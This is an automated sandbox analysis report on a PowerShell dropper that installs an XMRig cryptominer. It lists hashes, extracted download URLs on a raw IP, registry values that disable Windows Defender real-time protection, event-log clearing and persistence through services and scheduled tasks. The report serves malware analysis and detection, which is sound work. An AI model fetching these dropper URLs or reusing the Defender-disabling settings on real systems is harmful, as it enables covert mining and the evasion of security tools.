xmrig | c0fe0c93b610f4e952a51febb4d1473ca9b164250cb6b94b3a360a7c39a7b66e

Analysis

max time kernel
150s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
28-03-2024 08:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

get.ps1
Size

8KB
MD5

ae465af2287d24ccdeec8035a1e3f159
SHA1

e32c4c6c0a46e409cb81a28fe1aefc2e1aae569b
SHA256

c0fe0c93b610f4e952a51febb4d1473ca9b164250cb6b94b3a360a7c39a7b66e
SHA512

431361d8db7b27cbe22f56379ac6e68c54161bdb4702359ed927f9bb144c1f160688165805d3872044bf884fd66467f2c9da0b048a377d3b50010fcff5104be6
SSDEEP

192:Gswo+GbNlXOxscP5FTHkcJqYfZ13JkIL1SgQ4iPYyoc:Rh+qLOxFxicYIZ13KIU/dPYyj

Score

10^/10

xmrig evasion miner persistence ransomware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://111.90.158.40/kill.png?random=20240328084716

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://111.90.158.40/get.png?random=1711615656

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://111.90.158.40/kill.png?random=20240328084740

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

XMRig Miner payload 4 IoCs

miner

Processes:

resource	yara_rule
C:\Windows\Fonts\taskhostw.exe	family_xmrig
C:\Windows\Fonts\taskhostw.exe	xmrig
C:\Windows\Fonts\taskhostw.exe	family_xmrig
C:\Windows\Fonts\taskhostw.exe	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Clears Windows event logs 1 TTPs 16 IoCs

evasion ransomware

Indicator Removal

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
2168	wevtutil.exe
4724	wevtutil.exe
4592	wevtutil.exe
1728	wevtutil.exe
5064	wevtutil.exe
3264	wevtutil.exe
4904	wevtutil.exe
3332	wevtutil.exe
3040	wevtutil.exe
3652	wevtutil.exe
4116	wevtutil.exe
4928	wevtutil.exe
5016	wevtutil.exe
4912	wevtutil.exe
4008	wevtutil.exe
4192	wevtutil.exe

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

16 956 powershell.exe
17 956 powershell.exe
22 4700 powershell.exe
44 4272 powershell.exe
47 4272 powershell.exe
48 532 powershell.exe
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

flow	pid	process
16	956	powershell.exe
17	956	powershell.exe
22	4700	powershell.exe
44	4272	powershell.exe
47	4272	powershell.exe
48	532	powershell.exe

Drops file in Drivers directory 14 IoCs

Processes:

powershell.exeexpand.exeexpand.exe

description	ioc	process
File created	C:\Windows\System32\drivers\aswArPots.sys.tmp	powershell.exe
File opened for modification	C:\Windows\System32\drivers\{DDE4E8AC-BC75-4B80-B372-DD4504165DBF}	expand.exe
File opened for modification	C:\Windows\System32\drivers\IObitUnlockers.sys	expand.exe
File opened for modification	C:\Windows\System32\drivers\{C3425678-AC13-4C69-A49E-DA5D5616ED11}	expand.exe
File opened for modification	C:\Windows\System32\drivers\bb86f999a5794d53a17cc55b020b3934$dpx$.tmp	expand.exe
File opened for modification	C:\Windows\System32\drivers\IObitUnlockers.sys.tmp	powershell.exe
File opened for modification	C:\Windows\System32\drivers\598097bb61174c37ba819d581fb1944d$dpx$.tmp	expand.exe
File opened for modification	C:\Windows\System32\drivers\aswArPots.sys.tmp	powershell.exe
File created	C:\Windows\System32\drivers\IObitUnlockers.sys.tmp	powershell.exe
File opened for modification	C:\Windows\System32\drivers\bb86f999a5794d53a17cc55b020b3934$dpx$.tmp\job.xml	expand.exe
File opened for modification	C:\Windows\System32\drivers\598097bb61174c37ba819d581fb1944d$dpx$.tmp\job.xml	expand.exe
File created	C:\Windows\System32\drivers\598097bb61174c37ba819d581fb1944d$dpx$.tmp\d14f8a63e255884dbb6d718db2e1be03.tmp	expand.exe
File opened for modification	C:\Windows\System32\drivers\aswArPots.sys	expand.exe
File created	C:\Windows\System32\drivers\bb86f999a5794d53a17cc55b020b3934$dpx$.tmp\6a41bf47afea2f43a88a2f781eba7fae.tmp	expand.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

956 powershell.exe
Executes dropped EXE 6 IoCs

Processes:

curl.exesmartsscreen.execurl.execurl.execurl.exetaskhostw.exe

pid process

1596 curl.exe
2120 smartsscreen.exe
4912 curl.exe
4848 curl.exe
4332 curl.exe
2072 taskhostw.exe
Loads dropped DLL 1 IoCs

Processes:

msdtc.exe

pid process

4448 msdtc.exe
Drops desktop.ini file(s) 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\$Recycle.Bin\S-1-5-21-1497073144-2389943819-3385106915-1000\desktop.ini powershell.exe

pid	process
1596	curl.exe
2120	smartsscreen.exe
4912	curl.exe
4848	curl.exe
4332	curl.exe
2072	taskhostw.exe

pid	process
4448	msdtc.exe

description	ioc	process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1497073144-2389943819-3385106915-1000\desktop.ini	powershell.exe

Drops file in System32 directory 15 IoCs

Processes:

msdtc.exeexpand.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_FB287BEB63DB9E8D59A799779773B97C	msdtc.exe
File opened for modification	C:\Windows\System32\a4670e5371ef4d069e622cf368867d4a$dpx$.tmp	expand.exe
File opened for modification	C:\Windows\System32\a4670e5371ef4d069e622cf368867d4a$dpx$.tmp\job.xml	expand.exe
File created	C:\Windows\System32\a4670e5371ef4d069e622cf368867d4a$dpx$.tmp\493a8d37ba4a584cb5e073cb0bfbea9c.tmp	expand.exe
File opened for modification	C:\Windows\System32\oci.dll.tmp	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_FB287BEB63DB9E8D59A799779773B97C	msdtc.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\dns-query[1]	msdtc.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\get[1].png	msdtc.exe
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\oci.dll.tmp	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\oci.dll	expand.exe
File opened for modification	C:\Windows\system32\MSDtc\MSDTC.LOG	msdtc.exe
File opened for modification	C:\Windows\System32\{83033551-D35A-4C5E-9D45-C48553E4D4E2}	expand.exe

Drops file in Windows directory 64 IoCs

Processes:

expand.exeexpand.exeexpand.exepowershell.exeexpand.exeexpand.exepowershell.exeexpand.exeexpand.exemsdtc.execurl.execurl.exe

description	ioc	process
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	expand.exe
File created	C:\Windows\Fonts\61457a3645e24e6ea7ff19b5d0fe4c14$dpx$.tmp\6d41c791bac4504cb3e187661e9c73ad.tmp	expand.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Logs\MoSetup\UpdateAgent.log	powershell.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Fonts\f633a625b18f4850ac56ffc510935573$dpx$.tmp\job.xml	expand.exe
File opened for modification	C:\Windows\Logs\CBS	powershell.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	powershell.exe
File opened for modification	C:\Windows\Logs\HomeGroup	powershell.exe
File opened for modification	C:\Windows\Logs\Telephony	powershell.exe
File opened for modification	C:\Windows\Logs\waasmedic\waasmedic.20231215_111443_969.etl	powershell.exe
File opened for modification	C:\Windows\Fonts\116e70c38e06433e9546291db3d2fd9d$dpx$.tmp\job.xml	expand.exe
File opened for modification	C:\Windows\Fonts\smartsscreen.exe.tmp2	expand.exe
File opened for modification	C:\Windows\Logs\WindowsUpdate\WindowsUpdate.20240328.084723.200.1.etl	powershell.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Logs\DISM	powershell.exe
File created	C:\Windows\Fonts\curl.exe.tmp	powershell.exe
File opened for modification	C:\Windows\Logs\waasmedic	powershell.exe
File opened for modification	C:\Windows\Fonts\WinRing0x64.sys	expand.exe
File opened for modification	C:\Windows\Logs\SettingSync	powershell.exe
File opened for modification	C:\Windows\Fonts\f633a625b18f4850ac56ffc510935573$dpx$.tmp	expand.exe
File opened for modification	C:\Windows\Fonts\61457a3645e24e6ea7ff19b5d0fe4c14$dpx$.tmp	expand.exe
File opened for modification	C:\Windows\Fonts\curl.exe.tmp	powershell.exe
File opened for modification	C:\Windows\Logs\WindowsUpdate\WindowsUpdate.20231215.111423.500.3.etl	powershell.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\DtcInstall.log	msdtc.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	powershell.exe
File opened for modification	C:\Windows\Logs\waasmedic\waasmedic.20231215_111443_969.etl	powershell.exe
File opened for modification	C:\Windows\Logs\NetSetup	powershell.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Fonts\af45d3807ac4409fa7c9cdacce9e236e$dpx$.tmp\job.xml	expand.exe
File created	C:\Windows\Fonts\af45d3807ac4409fa7c9cdacce9e236e$dpx$.tmp\5f09279982fe6541b6bfe358b63a7c07.tmp	expand.exe
File created	C:\Windows\Fonts\taskhostw.png	curl.exe
File opened for modification	C:\Windows\Logs\waasmedic	powershell.exe
File opened for modification	C:\Windows\Logs\WindowsUpdate\WindowsUpdate.20231215.111423.500.1.etl	powershell.exe
File opened for modification	C:\Windows\Logs\WindowsUpdate	powershell.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Fonts\{FE208933-AA7C-403D-89D3-EFD139AAB019}	expand.exe
File opened for modification	C:\Windows\Fonts\61457a3645e24e6ea7ff19b5d0fe4c14$dpx$.tmp\job.xml	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	powershell.exe
File created	C:\Windows\Fonts\116e70c38e06433e9546291db3d2fd9d$dpx$.tmp\ec8bca3d2495d74687a196caed776a19.tmp	expand.exe
File created	C:\Windows\Fonts\f633a625b18f4850ac56ffc510935573$dpx$.tmp\24321d5c82e3084c83c5eff232de38e1.tmp	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	powershell.exe
File opened for modification	C:\Windows\Logs\waasmedic\waasmedic.20231215_111136_816.etl	powershell.exe
File opened for modification	C:\Windows\Logs\waasmedic\waasmedic.20240328_084713_049.etl	powershell.exe
File opened for modification	C:\Windows\Logs\waasmedic\waasmedic.20240328_084713_049.etl	powershell.exe
File opened for modification	C:\Windows\Logs\MoSetup	powershell.exe
File opened for modification	C:\Windows\Fonts\af45d3807ac4409fa7c9cdacce9e236e$dpx$.tmp	expand.exe
File opened for modification	C:\Windows\Fonts\{2BE53FD6-4A83-4E57-A9CE-792BE8C6D495}	expand.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Logs\CBS	powershell.exe
File opened for modification	C:\Windows\Logs\MoSetup\ActionList.xml	powershell.exe
File opened for modification	C:\Windows\Logs\MoSetup\DeviceInventory.xml	powershell.exe
File opened for modification	C:\Windows\Logs\WindowsUpdate\WindowsUpdate.20231215.111423.500.2.etl	powershell.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	powershell.exe
File opened for modification	C:\Windows\Logs\DPX	powershell.exe
File opened for modification	C:\Windows\Fonts\{D958E7EB-711A-46DE-905A-DE1003C748A6}	expand.exe
File opened for modification	C:\Windows\Logs\DPX	powershell.exe
File opened for modification	C:\Windows\Logs\NetSetup\service.0.etl	powershell.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	expand.exe
File created	C:\Windows\Fonts\config.json	curl.exe
File opened for modification	C:\Windows\Logs\waasmedic\waasmedic.20231215_111136_816.etl	powershell.exe

Launches sc.exe 29 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1824	sc.exe
4072	sc.exe
3716	sc.exe
4408	sc.exe
4216	sc.exe
4688	sc.exe
3848	sc.exe
4124	sc.exe
1184	sc.exe
1588	sc.exe
2008	sc.exe
2388	sc.exe
4804	sc.exe
2452	sc.exe
4532	sc.exe
5004	sc.exe
924	sc.exe
924	sc.exe
2156	sc.exe
2296	sc.exe
4432	sc.exe
1824	sc.exe
3852	sc.exe
3812	sc.exe
2444	sc.exe
984	sc.exe
2008	sc.exe
4164	sc.exe
4948	sc.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2140 schtasks.exe
3136 schtasks.exe
2216 schtasks.exe
1744 schtasks.exe
1740 schtasks.exe
1440 schtasks.exe

pid	process
2140	schtasks.exe
3136	schtasks.exe
2216	schtasks.exe
1744	schtasks.exe
1740	schtasks.exe
1440	schtasks.exe

Kills process with taskkill 11 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3936	taskkill.exe
1400	taskkill.exe
4408	taskkill.exe
4476	taskkill.exe
2076	taskkill.exe
3496	taskkill.exe
5008	taskkill.exe
3812	taskkill.exe
3272	taskkill.exe
3892	taskkill.exe
4716	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

smartsscreen.exepowershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1802 = "Line Islands Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1971 = "Belarus Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-492 = "India Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2391 = "Aleutian Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time"	smartsscreen.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time"	smartsscreen.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2431 = "Cuba Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-362 = "GTB Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	smartsscreen.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time"	smartsscreen.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-202 = "US Mountain Standard Time"	smartsscreen.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time"	smartsscreen.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-3051 = "Qyzylorda Daylight Time"	smartsscreen.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time"	smartsscreen.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2791 = "Novosibirsk Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time"	smartsscreen.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time"	smartsscreen.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exesmartsscreen.exe

pid	process
956	powershell.exe
956	powershell.exe
4700	powershell.exe
4700	powershell.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe
2120	smartsscreen.exe

Suspicious behavior: LoadsDriver 6 IoCs

Processes:

pid process

660
660
660
660
660
660

pid	process
660
660
660
660
660
660

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

